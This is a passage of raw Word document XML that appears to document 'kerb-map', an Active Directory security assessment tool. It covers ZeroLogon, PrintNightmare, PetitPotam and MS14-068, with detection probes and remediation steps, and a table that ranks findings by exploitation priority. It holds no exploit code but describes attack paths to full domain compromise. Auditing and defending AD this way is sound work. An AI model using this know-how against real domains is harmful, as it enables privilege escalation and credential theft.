    <w:p w14:paraId="3B48FB04" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2A656" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc224561311"/>
      <w:r>
        <w:t>5.3  ZeroLogon — CVE-2020-1472  [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="214421F0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Netlogon elevation of privilege. An unauthenticated attacker within network reach of a DC can set the DC machine account password to an empty string, authenticate as the DC, and run a DCSync to dump all domain hashes. Requires no credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6AEDB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection uses a two-layer approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFEEA04" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Layer 1 (safe): Checks domain functional level as an indicator of patch status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316468DB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Layer 2 (aggressive): Sends a malformed NetrServerAuthenticate3 request with a zeroed credential. A patched DC returns an error immediately; an unpatched DC may accept it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74176562"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707BE4" w14:paraId="6920768B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2471A3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="409959E9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7920" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF5FB"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="561B1C7B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The RPC probe in kerb-map is non-destructive. It does NOT set the machine account password. It only tests whether the DC accepts the zeroed credential in the ServerAuthenticate3 handshake.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D70A6DD" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE2323" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc224561312"/>
      <w:r>
        <w:t>5.4  PrintNightmare — CVE-2021-1675 / CVE-2021-34527  [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="6A56A7B1" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The Print Spooler service running on a Domain Controller allows any authenticated user to coerce the DC to authenticate to an attacker-controlled machine via the MS-RPRN RPC interface. This forced authentication can be relayed to obtain a TGT for the DC machine account or relayed to AD CS for a domain compromise certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C1110" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Detection: The module attempts to bind to the \pipe\spoolss named pipe over SMB. If the bind succeeds, the spooler is running and the DC is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D74B88" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation: Disable the Print Spooler service on all Domain Controllers. No DC should ever have a print spooler running.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2136535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B798D81" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># On the DC:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4C975AF1"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C27593D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Stop-Service Spooler -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4713904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588AAF6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A8D8EA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Set-Service Spooler -StartupType Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54931018" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD3ED0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc224561313"/>
      <w:r>
        <w:t>5.5  PetitPotam — CVE-2021-36942  [Aggressive]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="4ABF8016" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The EFS (Encrypting File System) RPC interface can be abused by any unauthenticated attacker to coerce a DC to authenticate to an arbitrary host via NTLM or Kerberos. When AD CS with HTTP enrollment is present in the environment, this creates a full domain compromise path without any credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1B39F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Remediation: Apply KB5005413. Enable Extended Protection for Authentication (EPA) on AD CS IIS endpoints. Enable LDAP signing and channel binding on all DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69749641" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B51DFF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc224561314"/>
      <w:r>
        <w:t>5.6  MS14-068 — CVE-2014-6324  [PAC Forgery]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="174C8612" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Affects unpatched Windows Server 2008/2012 domain controllers. Allows any authenticated domain user to forge a PAC (Privilege Attribute Certificate) claiming Domain Admin group membership, then submit it to obtain a golden-ticket equivalent TGT. Detection is based on domain functional level as an indicator only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0307C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110FDFC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC669F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc224561315"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.  Scoring &amp; Priority Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="1F298C79" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>The scorer is the most operationally valuable component of kerb-map. After all modules complete, it cross-correlates every finding into a single unified list ranked by exploitation priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FED176" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B66BB5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc224561316"/>
      <w:r>
        <w:t>6.1  How Findings Are Ranked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="624EB3B0" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Each finding type is assigned a base priority score, then adjusted based on contextual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40"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00707BE4" w14:paraId="0E80215F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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00506096" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Finding Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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26961D08" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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67E47AC5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Adjustments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4346CF01" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="21EB586A" w14:textId="77777777">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48D0257" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE — CRITICAL severity</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09FB2BA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>98</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9984B5B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None</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428FCE55" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="20F5E7B5" w14:textId="77777777">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CABA390" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unconstrained Delegation</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FAEA8F9" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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A95343F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None — always critical</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9021BEB" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="544A51A4" w14:textId="77777777">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4C6BC5C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE — HIGH severity</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734D257" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>85</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07620EF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None</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EDA35AF" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="4F6E531A" w14:textId="77777777">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22ADCF7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password spray (no lockout)</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16BC826" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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EEA1A2C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None</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5FABE97" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="5F6FA11F" w14:textId="77777777">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676DD08" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DnsAdmins member</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90A5021" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>88</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BB0BBC3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None</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61FDD0B" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="431386B5" w14:textId="77777777">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8850FF5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AS-REP Roast + admin</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3C200DA" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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4A74C50" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+15 for admin group membership</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61277DD7" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2DE4673A" w14:textId="77777777">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F23B348" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AS-REP Roast (standard)</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7A1AFB6" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>75</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0DEE22A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Base score</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1972146" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="6096C436" w14:textId="77777777">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E58EC05" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Constrained Deleg S4U2Self</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4634E64" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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0C30C40" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Only if protocol transition enabled</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5B9B663" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="04FE50B2" w14:textId="77777777">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2F23A11" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SPN Kerberoast</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1AA479C" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0-100</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C8A16AC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Calculated by scoring algorithm (Sec 4.1)</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489486A5" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Varies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="7A7BBD8A" w14:textId="77777777">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B6A6D98" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>RBCD</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CFB2B26" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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AB31CDC" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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466E56A" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707BE4" w14:paraId="2F5097DA" w14:textId="77777777">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8235383" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Trust abuse</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E47B682" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>75</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031850D" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Only SID filtering disabled trusts</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6CA05E3" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
